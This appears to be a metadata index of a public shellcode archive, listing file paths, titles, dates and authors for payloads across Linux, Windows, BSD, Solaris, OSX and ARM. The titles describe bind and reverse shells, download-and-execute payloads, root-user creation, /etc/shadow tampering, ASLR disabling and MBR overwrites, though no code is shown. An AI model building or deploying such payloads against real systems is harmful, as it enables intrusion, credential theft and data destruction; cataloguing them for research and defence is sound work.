220 13462 shellcodes/linux_x86/13462.c Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes) 2000-08-07 anonymous shellcode linux_x86
221 13463 shellcodes/linux_x86-64/13463.c Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) 2009-05-18 evil.xi4oyu shellcode linux_x86-64
222 13464 shellcodes/linux_x86-64/13464.s Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes) Linux/x64 - execve(/bin/sh) Shellcode (33 bytes) 2006-11-02 hophet shellcode linux_x86-64
223 13465 shellcodes/multiple/13465.c Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes) 2005-11-15 Charles Stevenson shellcode multiple
224 13466 shellcodes/multiple/13466.c OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes) 2005-11-13 nemo shellcode multiple
225 13467 shellcodes/multiple/13467.c Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes) 2004-09-12 dymitri shellcode multiple
229 13471 shellcodes/netbsd_x86/13471.c NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
230 13472 shellcodes/netbsd_x86/13472.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
231 13473 shellcodes/netbsd_x86/13473.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
232 13474 shellcodes/netbsd_x86/13474.txt shellcodes/netbsd_x86/13474.c NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes) 2004-09-26 humble shellcode netbsd_x86
233 13475 shellcodes/openbsd_x86/13475.c OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) 2006-05-01 hophet shellcode openbsd_x86
234 13476 shellcodes/openbsd_x86/13476.c OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes) 2004-09-26 Sinan Eren shellcode openbsd_x86
235 13477 shellcodes/openbsd_x86/13477.c OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes) 2004-09-26 anonymous shellcode openbsd_x86
249 13491 shellcodes/generator/13491.c Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator) 2006-07-21 xort shellcode generator
250 13492 shellcodes/solaris_sparc/13492.c Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes) 2005-11-20 lhall shellcode solaris_sparc
251 13493 shellcodes/solaris_sparc/13493.c Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes) 2005-11-20 lhall shellcode solaris_sparc
252 13494 shellcodes/solaris_sparc/13494.txt shellcodes/solaris_sparc/13494.c Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) 2004-09-26 LSD-PLaNET shellcode solaris_sparc
253 13495 shellcodes/solaris_sparc/13495.c Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
254 13496 shellcodes/solaris_sparc/13496.c Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
255 13497 shellcodes/solaris_sparc/13497.txt shellcodes/solaris_sparc/13497.c Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) 2000-11-19 dopesquad.net shellcode solaris_sparc
256 13498 shellcodes/generator/13498.php Solaris/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-16 Jonathan Salwan shellcode generator
257 13499 shellcodes/solaris_x86/13499.c Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes) 2008-12-02 sm4x shellcode solaris_x86
258 13500 shellcodes/solaris_x86/13500.c Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes) 2008-12-02 sm4x shellcode solaris_x86
259 13501 shellcodes/solaris_x86/13501.txt shellcodes/solaris_x86/13501.c Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) 2004-09-26 anonymous shellcode solaris_x86
260 13502 shellcodes/solaris_x86/13502.txt shellcodes/solaris_x86/13502.c Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) 2004-09-26 anonymous shellcode solaris_x86
261 13503 shellcodes/unixware/13503.txt shellcodes/unixware/13503.c UnixWare - execve(/bin/sh) Shellcode (95 bytes) 2004-09-26 K2 shellcode unixware
262 13504 shellcodes/windows_x86/13504.asm Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode 2009-07-27 Skylined shellcode windows_x86
263 13505 shellcodes/windows_x86/13505.c Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes) 2009-07-17 Stack shellcode windows_x86
264 13507 shellcodes/windows_x86/13507.txt Windows/x86 - Egg Omelet SEH Shellcode 2009-03-16 Skylined shellcode windows_x86
268 13511 shellcodes/windows_x86/13511.c Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes) 2009-02-03 Stack shellcode windows_x86
269 13512 shellcodes/windows_x86/13512.c Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes) 2008-09-03 Koshi shellcode windows_x86
270 13513 shellcodes/windows_x86/13513.c Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes) 2008-09-03 Koshi shellcode windows_x86
271 13514 shellcodes/windows_x86/13514.asm Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode 2008-08-25 loco shellcode windows_x86
272 13515 shellcodes/generator/13515.pl Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator) 2008-03-14 YAG KOHHA shellcode generator
273 13516 shellcodes/windows_x86/13516.asm Windows/x86 - Download File + Execute Shellcode (192 bytes) 2007-06-27 czy shellcode windows_x86
274 13517 shellcodes/windows_x86/13517.asm Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) 2007-06-14 Weiss shellcode windows_x86
287 13530 shellcodes/windows_x86/13530.asm Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode 2004-09-26 Peter Winter-Smith shellcode windows_x86
288 13531 shellcodes/windows_x86/13531.c Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) 2004-09-26 silicon shellcode windows_x86
289 13532 shellcodes/windows_x86/13532.asm Windows - DCOM RPC2 Universal Shellcode 2003-10-09 anonymous shellcode windows_x86
290 13533 shellcodes/windows_x86-64/13533.asm Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) 2006-08-07 Weiss shellcode windows_x86-64
291 13548 shellcodes/linux_x86/13548.asm Linux/x86 - Kill All Processes Shellcode (9 bytes) 2010-01-14 root@thegibson shellcode linux_x86
292 13549 shellcodes/linux_x86/13549.c Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes) 2009-12-04 ka0x shellcode linux_x86
293 13550 shellcodes/linux_x86/13550.c Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes) 2009-12-04 ka0x shellcode linux_x86
295 13553 shellcodes/linux_x86/13553.c Linux/x86 - execve() Shellcode (51 bytes) 2009-12-04 fl0 fl0w shellcode linux_x86
296 13560 shellcodes/windows/13560.txt Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes) 2009-12-14 anonymous shellcode windows
297 13563 shellcodes/linux_x86/13563.asm Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) 2010-01-15 root@thegibson shellcode linux_x86
298 13565 shellcodes/windows_x86/13565.asm Windows/x86 (XP SP3) - ShellExecuteA Shellcode Windows/x86 (XP SP3) - ShellExecuteA() Shellcode 2009-12-19 sinn3r shellcode windows_x86
299 13566 shellcodes/linux_x86/13566.c Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode 2009-12-19 mr_me shellcode linux_x86
300 13569 shellcodes/windows_x86/13569.asm Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode 2009-12-24 sinn3r shellcode windows_x86
301 13570 shellcodes/freebsd_x86/13570.c FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes) 2009-12-24 sbz shellcode freebsd_x86
304 13574 shellcodes/windows_x86/13574.c Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) 2009-12-28 AnTi SeCuRe shellcode windows_x86
305 13576 shellcodes/linux_x86/13576.asm Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes) 2010-01-16 root@thegibson shellcode linux_x86
306 13577 shellcodes/linux_x86/13577.txt Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes) 2009-12-30 root@thegibson shellcode linux_x86
307 13578 shellcodes/linux_x86/13578.txt shellcodes/linux_x86/13578.asm Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) 2009-12-30 root@thegibson shellcode linux_x86
308 13579 shellcodes/linux_x86/13579.c Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes) 2009-12-31 $andman shellcode linux_x86
309 13581 shellcodes/windows/13581.txt Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) 2010-01-03 Aodrulez shellcode windows
310 13582 shellcodes/windows/13582.txt Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) 2010-01-03 Aodrulez shellcode windows
311 13586 shellcodes/linux_x86/13586.txt shellcodes/linux_x86/13586.asm Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) 2010-01-08 root@thegibson shellcode linux_x86
312 13595 shellcodes/windows_x86/13595.c Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes) 2010-01-20 SkuLL-HackeR shellcode windows_x86
313 13599 shellcodes/linux_x86/13599.txt shellcodes/linux_x86/13599.c Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
314 13600 shellcodes/linux_x86/13600.txt shellcodes/linux_x86/13600.c Linux/x86 - ip6tables -F Shellcode (47 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
315 13601 shellcodes/linux_x86/13601.txt shellcodes/linux_x86/13601.c Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
316 13602 shellcodes/linux_x86/13602.txt shellcodes/linux_x86/13602.c Linux/i686 - pacman -R <package> Shellcode (59 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
317 13609 shellcodes/linux_x86/13609.c Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes) 2010-02-09 fb1h2s shellcode linux_x86
318 13614 shellcodes/windows_x86/13614.c Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
319 13615 shellcodes/windows_x86/13615.c Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
322 13630 shellcodes/windows_x86/13630.c Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes) 2010-02-28 Hazem mofeed shellcode windows_x86
323 13631 shellcodes/windows_x86/13631.c Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes) 2010-03-01 Hazem mofeed shellcode windows_x86
324 13632 shellcodes/linux_x86/13632.c Linux/x86 - Disable modsecurity Shellcode (64 bytes) 2010-03-04 sekfault shellcode linux_x86
325 13635 shellcodes/windows_x86/13635.txt shellcodes/windows_x86/13635.as Windows/x86 - JITed Stage-0 Shellcode 2010-03-07 Alexey Sintsov shellcode windows_x86
326 13636 shellcodes/windows_x86/13636.c Windows/x86 - JITed exec notepad Shellcode 2010-03-08 Alexey Sintsov shellcode windows_x86
327 13639 shellcodes/windows_x86/13639.c Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes) 2010-03-11 Stoke shellcode windows_x86
328 13642 shellcodes/windows_x86/13642.txt shellcodes/windows_x86/13642.asm Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes) Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes) 2010-03-18 czy shellcode windows_x86
329 13645 shellcodes/windows/13645.c Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode 2010-03-20 Alexey Sintsov shellcode windows
330 13647 shellcodes/windows_x86/13647.txt Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes) 2010-03-24 lord Kelvin shellcode windows_x86
331 13648 shellcodes/windows_x86/13648.rb Windows/x86 - MessageBox Shellcode (Metasploit) Windows/x86 - MessageBox Shellcode (Generator) (Metasploit) 2010-03-24 corelanc0d3r shellcode windows_x86
332 13649 shellcodes/windows/13649.txt shellcodes/windows/13649.as Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode 2010-03-27 Alexey Sintsov shellcode windows
333 13661 shellcodes/linux_x86/13661.txt Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode 2010-04-02 anonymous shellcode linux_x86
334 13669 shellcodes/linux_x86/13669.c Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) 2010-04-14 Magnefikko shellcode linux_x86
335 13670 shellcodes/linux_x86/13670.c Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) 2010-04-14 Magnefikko shellcode linux_x86
342 13680 shellcodes/linux_x86/13680.c Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes) 2010-04-21 Jonathan Salwan shellcode linux_x86
343 13681 shellcodes/linux_x86/13681.c Linux/x86 - Fork Bomb Shellcode (6 bytes) (2) 2010-04-21 Jonathan Salwan shellcode linux_x86
344 13682 shellcodes/linux_x86/13682.c Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes) 2010-04-22 Magnefikko shellcode linux_x86
345 13688 shellcodes/linux_x86-64/13688.c Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes) 2010-04-25 zbt shellcode linux_x86-64
346 13691 shellcodes/linux_x86-64/13691.c Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) Linux/x64 - execve(/bin/sh) Shellcode (30 bytes) 2010-04-25 zbt shellcode linux_x86-64
347 13692 shellcodes/linux_x86/13692.c Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes) 2010-04-25 condis shellcode linux_x86
348 13697 shellcodes/linux_x86/13697.c Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes) 2010-05-04 Jonathan Salwan shellcode linux_x86
349 13698 shellcodes/linux_x86/13698.c Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes) 2010-05-05 Jonathan Salwan shellcode linux_x86
350 13699 shellcodes/windows_x86/13699.txt Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode 2010-05-10 Crack_MaN shellcode windows_x86
351 13702 shellcodes/linux_x86/13702.c Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes) 2010-05-17 Jonathan Salwan shellcode linux_x86
352 13703 shellcodes/linux_x86/13703.txt shellcodes/linux_x86/13703.c Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
353 13704 shellcodes/solaris_x86/13704.c Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
354 13707 shellcodes/solaris_x86/13707.c Solaris/x86 - Halt Shellcode (36 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
355 13709 shellcodes/solaris_x86/13709.c Solaris/x86 - Reboot() Shellcode (37 bytes) 2010-05-21 Jonathan Salwan shellcode solaris_x86
357 13712 shellcodes/linux_x86/13712.c Linux/x86 - Disable ASLR Security Shellcode (106 bytes) 2010-05-25 Jonathan Salwan shellcode linux_x86
358 13715 shellcodes/linux_x86/13715.c Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes) 2010-05-27 agix shellcode linux_x86
359 13716 shellcodes/linux_x86/13716.c Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes) 2010-05-27 agix shellcode linux_x86
360 13719 shellcodes/windows_x86-64/13719.txt shellcodes/windows_x86-64/13719.c Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) 2010-05-28 agix shellcode windows_x86-64
361 13722 shellcodes/linux_x86/13722.c Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes) 2010-05-31 antrhacks shellcode linux_x86
362 13723 shellcodes/linux_x86/13723.c Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
363 13724 shellcodes/linux_x86/13724.c Linux/x86 - Kill All Running Process Shellcode (11 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
364 13725 shellcodes/linux_x86/13725.txt shellcodes/linux_x86/13725.c Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
365 13726 shellcodes/linux_x86/13726.txt shellcodes/linux_x86/13726.c Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
366 13728 shellcodes/linux_x86/13728.c Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes) 2010-06-01 gunslinger_ shellcode linux_x86
367 13729 shellcodes/windows_x86-64/13729.txt shellcodes/windows_x86-64/13729.c Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes) Windows/x64 (7) - cmd.exe Shellcode (61 bytes) 2010-06-01 agix shellcode windows_x86-64
368 13730 shellcodes/linux_x86/13730.c Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes) 2010-06-02 gunslinger_ shellcode linux_x86
369 13731 shellcodes/linux_x86/13731.c Linux/x86 - Hard Reboot Shellcode (29 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
370 13732 shellcodes/linux_x86/13732.c Linux/x86 - Hard Reboot Shellcode (33 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
372 13742 shellcodes/linux_x86/13742.c Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
373 13743 shellcodes/linux_x86/13743.c Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
374 14334 shellcodes/linux_x86/14334.c Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes) 2010-07-11 blake shellcode linux_x86
375 13828 shellcodes/windows/13828.c Windows - MessageBoxA Shellcode (238 bytes) Windows - MessageBoxA() Shellcode (238 bytes) 2010-06-11 RubberDuck shellcode windows
376 13875 shellcodes/solaris_x86/13875.c Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes) 2010-06-14 Jonathan Salwan shellcode solaris_x86
377 13908 shellcodes/linux_x86-64/13908.c Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) Linux/x64 - Disable ASLR Security Shellcode (143 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
378 13910 shellcodes/linux_x86/13910.c Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
379 13915 shellcodes/linux_x86-64/13915.txt shellcodes/linux_x86-64/13915.c Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
380 13943 shellcodes/linux_x86-64/13943.c Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) 2010-06-20 Jonathan Salwan shellcode linux_x86-64
381 14014 shellcodes/generator/14014.pl Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator) Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator) 2010-06-24 d0lc3 shellcode generator
382 14116 shellcodes/arm/14116.txt shellcodes/arm/14116.c Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes) 2010-06-29 Jonathan Salwan shellcode arm
383 14052 shellcodes/windows/14052.c Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes) Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes) 2010-06-25 RubberDuck shellcode windows
384 14097 shellcodes/arm/14097.c Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes) 2010-06-28 Jonathan Salwan shellcode arm
385 14119 shellcodes/linux_x86/14119.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes) 2010-06-29 gunslinger_ shellcode linux_x86
386 14142 shellcodes/arm/14142.c Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes) 2010-06-30 Florian Gaultier shellcode arm
387 14122 shellcodes/arm/14122.txt shellcodes/arm/14122.c Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) 2010-06-29 Florian Gaultier shellcode arm
388 14139 shellcodes/arm/14139.c Linux/ARM - Disable ASLR Security Shellcode (102 bytes) 2010-06-30 Jonathan Salwan shellcode arm
389 14190 shellcodes/arm/14190.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes) 2010-07-03 Jonathan Salwan shellcode arm
390 14216 shellcodes/linux_x86/14216.c Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes) 2010-07-05 Magnefikko shellcode linux_x86
396 14261 shellcodes/generator/14261.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator) 2010-07-07 Jonathan Salwan shellcode generator
397 14276 shellcodes/linux_x86/14276.c Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes) 2010-07-08 gunslinger_ shellcode linux_x86
398 14288 shellcodes/windows_x86/14288.asm Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni shellcode windows_x86
399 14305 shellcodes/linux_x86-64/14305.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) 2010-07-09 10n1z3d shellcode linux_x86-64
400 14332 shellcodes/linux_x86/14332.c Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes) 2010-07-11 blake shellcode linux_x86
401 14691 shellcodes/linux_x86/14691.c Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes) 2010-08-19 Aodrulez shellcode linux_x86
402 14697 shellcodes/windows/14697.c Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes) Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes) 2010-08-20 Glafkos Charalambous shellcode windows
403 14795 shellcodes/bsd_x86/14795.c BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes) 2010-08-25 beosroot shellcode bsd_x86
404 14873 shellcodes/windows_x86/14873.asm Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes) 2010-09-01 dijital1 shellcode windows_x86
405 14907 shellcodes/arm/14907.c Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes) 2010-09-05 Jonathan Salwan shellcode arm
413 15316 shellcodes/arm/15316.asm Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15317 shellcodes/arm/15317.asm Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
415 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
416 15618 shellcodes/osx/15618.c OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
417 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit) 2010-12-09 Jonathan Salwan shellcode generator
418 15879 shellcodes/windows_x86/15879.txt Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode 2010-12-31 Skylined shellcode windows_x86
419 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
420 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
421 16283 shellcodes/windows_x86/16283.txt shellcodes/windows_x86/16283.asm Windows/x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode windows_x86
422 17432 shellcodes/superh_sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode superh_sh4
423 17194 shellcodes/linux_x86/17194.txt shellcodes/linux_x86/17194.c Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode linux_x86
424 17224 shellcodes/osx/17224.s OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2011-04-29 hammackj shellcode osx
425 17323 shellcodes/windows/17323.c Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) 2011-05-25 RubberDuck shellcode windows
426 20195 shellcodes/linux_x86/20195.c Linux/x86 - Disable ASLR Security Shellcode (83 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
427 17326 shellcodes/generator/17326.rb Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit) 2011-05-26 Alexey Sintsov shellcode generator
428 17371 shellcodes/linux_x86/17371.c Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan shellcode linux_x86
429 17439 shellcodes/superh_sh4/17439.c Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes) 2011-06-23 Jonathan Salwan shellcode superh_sh4
430 17545 shellcodes/windows_x86/17545.txt shellcodes/windows_x86/17545.c Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) 2011-07-18 KaHPeSeSe shellcode windows_x86
431 17559 shellcodes/linux_x86/17559.c Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes) 2011-07-21 Ali Raheem shellcode linux_x86
432 17564 shellcodes/osx/17564.asm OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode 2011-07-24 pa_kt shellcode osx
433 17940 shellcodes/linux_mips/17940.c Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes) 2011-10-07 entropy shellcode linux_mips
434 17996 shellcodes/generator/17996.c Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator) 2011-10-18 entropy shellcode generator
435 18154 shellcodes/superh_sh4/18154.c Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes) 2011-11-24 Jonathan Salwan shellcode superh_sh4
